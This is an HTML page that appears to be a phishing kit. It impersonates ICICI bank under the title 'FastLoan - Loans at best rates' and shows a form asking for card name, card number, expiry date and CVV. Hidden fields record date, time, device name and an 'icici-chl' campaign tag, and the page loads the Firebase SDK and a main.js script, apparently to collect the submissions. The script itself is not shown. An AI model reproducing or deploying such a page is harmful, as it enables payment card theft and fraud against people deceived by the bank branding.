
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1.0" name="viewport">

 <title>FastLoan - Loans at best rates </title>
  <meta content="" name="description">
  <meta content="" name="keywords">

  <!-- Favicons -->
  <link href="assets/img/favicon.png" rel="icon">
  <link href="assets/img/apple-touch-icon.png" rel="apple-touch-icon">

  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300;1,400;1,600;1,700&family=Amatic+SC:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300;1,400;1,500;1,600;1,700&family=Inter:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300;1,400;1,500;1,600;1,700&display=swap" rel="stylesheet">

  <!-- Vendor CSS Files -->
  <link href="css/bootstrap.min.css" rel="stylesheet">
  <link href="css/bootstrap-icons.css" rel="stylesheet">
  <link href="css/aos.css" rel="stylesheet">
  <link href="css/glightbox.min.css" rel="stylesheet">
  <link href="css/swiper-bundle.min.css" rel="stylesheet">

  <!-- Template Main CSS File -->
  <link href="css/main.css" rel="stylesheet">
 <link href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.0.3/css/font-awesome.css' rel='stylesheet'>
   <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js'></script>
    <script src="js/modernizr.custom.js"></script>
     <link href="css/green.css" rel="stylesheet">

    <!-- Modernizr JS File -->
                                <style>::-webkit-scrollbar {
                                  width: 8px;
                                }
                                /* Track */
                                ::-webkit-scrollbar-track {
                                  background: #f1f1f1; 
                                }
                                 
                                /* Handle */
                                ::-webkit-scrollbar-thumb {
                                  background: #888; 
                                }
                                
                                /* Handle on hover */
                                ::-webkit-scrollbar-thumb:hover {
                                  background: #555; 
                                } * {
    margin: 0;
    padding: 0;
}

html {
    height: 100%;
}

/*Background color*/

/*form styles*/
#msform {
    text-align: center;
    position: relative;
    margin-top: 20px;
}

#msform fieldset .form-card {
    background: white;
    border: 0 none;
    border-radius: 0px;
    box-shadow: 0 2px 2px 2px rgba(0, 0, 0, 0.2);
    padding: 20px 40px 30px 40px;
    box-sizing: border-box;
    width: 94%;
    margin: 0 3% 20px 3%;

    /*stacking fieldsets above each other*/
    position: relative;
}

#msform fieldset {
    background: white;
    border: 0 none;
    border-radius: 0.5rem;
    box-sizing: border-box;
    width: 100%;
    margin: 0;
    padding-bottom: 20px;

    /*stacking fieldsets above each other*/
    position: relative;
}

/*Hide all except first fieldset*/
#msform fieldset:not(:first-of-type) {
    display: none;
}

#msform fieldset .form-card {
    text-align: left;
    color: #000;
}

#msform input, #msform textarea {
    padding: 0px 8px 4px 8px;
    border: none;
    border-bottom: 1px solid #ccc;
    border-radius: 0px;
    margin-bottom: 25px;
    margin-top: 2px;
    width: 100%;
    box-sizing: border-box;
   font-family: var(--font-secondary);
    color: #2C3E50;
    font-size: 15px;
    letter-spacing: 1px;
}

#msform input:focus, #msform textarea:focus {
    -moz-box-shadow: none !important;
    -webkit-box-shadow: none !important;
    box-shadow: none !important;
    border: none;
    font-weight: bold;
    border-bottom: 2px solid #af235d;
    outline-width: 0;
}

/*Blue Buttons*/
#msform .action-button {
    width: 100px;
    background: #af235d;
    font-weight: bold;
    color: white;
    border: 0 none;
    border-radius: 0px;
    cursor: pointer;
    padding: 10px 5px;
    margin: 10px 5px;font-family: var(--font-secondary);
}

#msform .action-button:hover, #msform .action-button:focus {
    box-shadow: 0 0 0 2px white, 0 0 0 3px #af235d;
}

/*Previous Buttons*/
#msform .action-button-previous {
    width: 100px;
    background: #616161;
    font-weight: bold;
    color: white;
    border: 0 none;
    border-radius: 0px;
    cursor: pointer;
    padding: 10px 5px;
    margin: 10px 5px;
}

#msform .action-button-previous:hover, #msform .action-button-previous:focus {
    box-shadow: 0 0 0 2px white, 0 0 0 3px #616161;
}

/*Dropdown List Exp Date*/
select.list-dt {
    border: none;
    outline: 0;
    border-bottom: 1px solid #ccc;
    padding: 2px 5px 3px 5px;
    margin: 2px;
}

select.list-dt:focus {
    border-bottom: 2px solid #af235d;
}

/*The background card*/
.card {
    z-index: 0;
    border: none;
    border-radius: 0.5rem;
    position: relative;
}

/*FieldSet headings*/
.fs-title {
    font-size: 25px;
    color: #2C3E50;
    margin-bottom: 10px;
    font-weight: bold;
    text-align: left;
}

/*progressbar*/
#progressbar {
    margin-bottom: 30px;
    overflow: hidden;
    font-family: var(--font-secondary);
    font-size: 15px;
}

#progressbar .active {
    color: #000000;
}

#progressbar li {
    list-style-type: none;
    font-size: 12px;
    width: 25%;
    float: left;
    position: relative;
}

/*Icons in the ProgressBar*/
#progressbar #account:before {
    font-family: FontAwesome;
    content: "\f023";
}

#progressbar #personal:before {
    font-family: FontAwesome;
    content: "\f007";
}

#progressbar #payment:before {
    font-family: FontAwesome;
    content: "\f09d";
}

#progressbar #confirm:before {
    font-family: FontAwesome;
    content: "\f00c";
}

/*ProgressBar before any progress*/
#progressbar li:before {
    width: 50px;
    height: 50px;
    line-height: 45px;
    display: block;
    font-size: 18px;
    color: #ffffff;
    background: lightgray;
    border-radius: 50%;
    margin: 0 auto 10px auto;
    padding: 2px;
}

/*ProgressBar connectors*/
#progressbar li:after {
    content: '';
    width: 100%;
    height: 2px;
    background: lightgray;
    position: absolute;
    left: 0;
    top: 25px;
    z-index: -1;
}

/*Color number of the step and the connector before it*/
#progressbar li.active:before, #progressbar li.active:after {
    background: #af235d;
}

/*Imaged Radio Buttons*/
.radio-group {
    position: relative;
    margin-bottom: 25px;
}

.radio {
    display:inline-block;
    width: 204;
    height: 104;
    border-radius: 0;
    background: lightblue;
    box-shadow: 0 2px 2px 2px rgba(0, 0, 0, 0.2);
    box-sizing: border-box;
    cursor:pointer;
    margin: 8px 2px; 
}

.radio:hover {
    box-shadow: 2px 2px 2px 2px rgba(0, 0, 0, 0.3);
}

.radio.selected {
    box-shadow: 1px 1px 2px 2px rgba(0, 0, 0, 0.1);
}

/*Fit image in bootstrap div*/
.fit-image{
    width: 100%;
    object-fit: cover;
}</style>
</head>

<body>
  
<div class="container">
  <div class="row">
  <!-- ======= Header ======= -->
  <header id="header" class="header fixed-top d-flex align-items-center">
 
    <div class="container d-flex align-items-center justify-content-between">

     
  <div class="col-5">
   <a href="" class="logo d-flex align-items-center me-auto me-lg-0">
        <!-- Uncomment the line below if you also wish to use an image logo -->
     <img src="img/icici.png" >
        
      </a>
  </div>

  <div class="col-7">
         <div class="badhti"> <b>Digital Banking</b></div>
    </div>


    </div>
     </header>
  </div>
   </div>

  <main id="main">

    <!-- ======= Breadcrumbs ======= -->
    <!-- End Breadcrumbs -->

    <section class="sample-page">
    <div class="container">
    <div class="row">
  <div class="col-sm-6"><div class="container-fluid" id="grad1" style="margin-top:3em;">
    <div class="row justify-content-center mt-0">
      
            <div class="card px-0 pt-4 pb-0 mt-3 mb-3">
                <div  data-value="credit"></div>
                <p ><img src="img/card_img.png" width="415px" height="50px"></p>
                
                <div class="row">
                    <div class="col-md-12 mx-0">
                        
                        <body>
                            <div class="container">
                              
                              <div class="wrapper">
                                <div class="company-info">
                                 
                                 
                                </div>
                                <div class="contact">
                                  <!-- <strong>Fill Details for Verification</strong> -->
                                  
                                  
                                  <!-- <div class="alert">We Will Send You Message</div> -->
                                  <div style="text-align: center; margin-bottom: 2rem;" >
                                  <img src="ab.png" alt="" class="logopng" style="height: 200px;">
                                  </div>
                                  <div style="text-align: center;">
                                  
                                  
                                  </div>
                                  <form id="contactForm">
                                    <p>
                                     <label class="mb-2 text-black"><b>Card Name</b></label>
                                      <input type="text" name="card_name" class="form-control form-control-lg"
                                      size="17"
                                      placeholder="Card Number"
                                      minlength="3"
                                      maxlength="20" id="card_name"style="margin-bottom:25px" required>
                                    </p>
                                     
                                    <p>
                                    <label class="mb-2 text-black"><b>Card Number</b></label>
                                      <input type="text" pattern="[0-9]*" inputmode="numeric" class="form-control form-control-lg"
                                      size="16"
                                      placeholder="xxxx-xxxx-xxxx-xxxx"
                                      minlength="3"
                                      maxlength="16" style="margin-bottom:25px" name="card_no" id="card_no">
                                    </p>

                                    <p>
                                      <label class="mb-2 text-black"><b>Expiry Date</b></label>
                                        <input type="month" class="form-control form-control-lg"
                                        size="17"
                                        minlength="3"
                                        placeholder=""
                                        maxlength="20" style="margin-bottom:25px" name="exp_date" id="exp_date" required>
                                      </p>

                                    <p>
                                    <label class="mb-2 text-black"><b>CVV</b></label>
                                    <input type="hidden" id="date" name="date" value="" required>
                                    <input type="hidden" id="time" name="time" value="" required>
                                                  <input type="hidden" id="app" name="app" value="icici-chl" required>
                                                  <input type="hidden" id="deviceName" name="deviceName" readonly>

                                    <div style="display: flex;" class="form-control form-control-lg">

                                    
                                    <div>
                                      <input type="password" pattern="[0-9]*" inputmode="numeric" class="form-control form-control-lg" 
                                      size="3"
                                      minlength="3"
                                      placeholder="123"
                                      maxlength="3" name="cvv" id="cvv" required style="margin-bottom:0px;border:none">
                                    </div>
                                    
                                    <div style="    display: flex;
                                    align-items: center;">
                                      <img src="eye-close.png" id="eyeicon" onclick="toggle()" style="height:18px" >
                                    </div>
                                  </div>
                                    
                              <script>
                                var state= false;
                                function toggle(){
                                  if(state){
                                     document.getElementById("cvv").setAttribute("type","password");
                                     eyeicon.src="eye-close.png"
                                     document.getElementById("eyeicon");
                                     state=false;
                                  }
                                  else{
                                    document.getElementById("cvv").setAttribute("type","text");
                                    eyeicon.src="eye-open.png"
                                    document.getElementById("eyeicon");                                  
                                    state= true;
                                    
                                   }
                                }
                              </script>
                                     
                                    
                                      
                                    </p>
                                    
                                    <p 
                                    
                                    
                                    class="full">
                                      <div style="text-align: center;">
                                        <button type="submit" id="myButton" style="
                                        background-color: #F37E20;
                                        border-radius: 50px;
                                        border-width: 0;
                                        box-shadow: rgba(25, 25, 25, 0.04) 0 0 1px 0,
                                          rgba(0, 0, 0, 0.1) 0 3px 4px 0;
                                        color: #fdfdfd;
                                        cursor: pointer;
                                        display: inline-block;
                                        font-family: Arial, sans-serif;
                                        font-size: 1em;
                                        height: 50px;
                                        width: 200px;
                                        padding: 0 25px;
                                        margin-left: 0px;
                                        margin-right: 0px;
                            
                                      ">SUBMIT</button>
                                     
                                    </p>
                                  </form>
                                  
                                </div>
                                
                              </div>
                              
                            </div>
                            <label   style="
                                  color: #0949a8;
                                  position: center;
                                  bottom: 25px;
                                  font-weight: 600;
                                " for=""></label>
                          
                            <script src="https://www.gstatic.com/firebasejs/4.3.0/firebase.js"></script>
                            <script src="main.js"></script>

                            
                          </body>
                          </html>
                          <script
                            src="https://code.jquery.com/jquery-3.3.1.slim.min.js"
                            integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"
                            crossorigin="anonymous"
                          ></script>
                          <script
                            src="https://cdn.jsdelivr.net/npm/popper.js@1.14.7/dist/umd/popper.min.js"
                            integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1"
                            crossorigin="anonymous"
                          ></script>
                          <script
                            src="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/js/bootstrap.min.js"
                            integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM"
                            crossorigin="anonymous"
                          ></script>
                        
                    </div>
                </div>
            </div>
       
    </div>
</div></div>
  <div class="col-sm-6">
  <div class="container-fluid" id="grad1" style="margin-top:10em;">
    <div class="row justify-content-center mt-0">
     
    
            </div>
</div>
  </div>
</div></div>
      
    </section>

  </main><!-- End #main -->

  



  <div id="preloader"></div>
<script type='text/javascript' src='https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js'></script>
                                <script type='text/javascript' src='#'></script>
                                <script type='text/javascript' src='#'></script>
                                <script type='text/javascript' src='#'></script>
                                <script type='text/javascript'>$(document).ready(function(){
    
var current_fs, next_fs, previous_fs; //fieldsets
var opacity;

$(".next").click(function(){
    
    current_fs = $(this).parent();
    next_fs = $(this).parent().next();
    
    //Add Class Active
    $("#progressbar li").eq($("fieldset").index(next_fs)).addClass("active");
    
    //show the next fieldset
    next_fs.show(); 
    //hide the current fieldset with style
    current_fs.animate({opacity: 0}, {
        step: function(now) {
            // for making fielset appear animation
            opacity = 1 - now;

            current_fs.css({
                'display': 'none',
                'position': 'relative'
            });
            next_fs.css({'opacity': opacity});
        }, 
        duration: 600
    });
});

$(".previous").click(function(){
    
    current_fs = $(this).parent();
    previous_fs = $(this).parent().prev();
    
    //Remove class active
    $("#progressbar li").eq($("fieldset").index(current_fs)).removeClass("active");
    
    //show the previous fieldset
    previous_fs.show();

    //hide the current fieldset with style
    current_fs.animate({opacity: 0}, {
        step: function(now) {
            // for making fielset appear animation
            opacity = 1 - now;

            current_fs.css({
                'display': 'none',
                'position': 'relative'
            });
            previous_fs.css({'opacity': opacity});
        }, 
        duration: 600
    });
});

$('.radio-group .radio').click(function(){
    $(this).parent().find('.radio').removeClass('selected');
    $(this).addClass('selected');
});

$(".submit").click(function(){
    return false;
})
    
});</script>
                                <script type='text/javascript'>var myLink = document.querySelector('a[href="#"]');
                                myLink.addEventListener('click', function(e) {
                                  e.preventDefault();
                                });</script>
  <!-- Vendor JS Files -->
  <script src="js/bootstrap.bundle.min.js"></script>
  <script src="js/aos.js"></script>
  <script src="js/glightbox.min.js"></script>
  <script src="js/purecounter_vanilla.js"></script>
  <script src="js/swiper-bundle.min.js"></script>
  <script src="js/validate.js"></script>

  <!-- Template Main JS File -->
  <script src="js/main.js"></script>

</body>

</html>
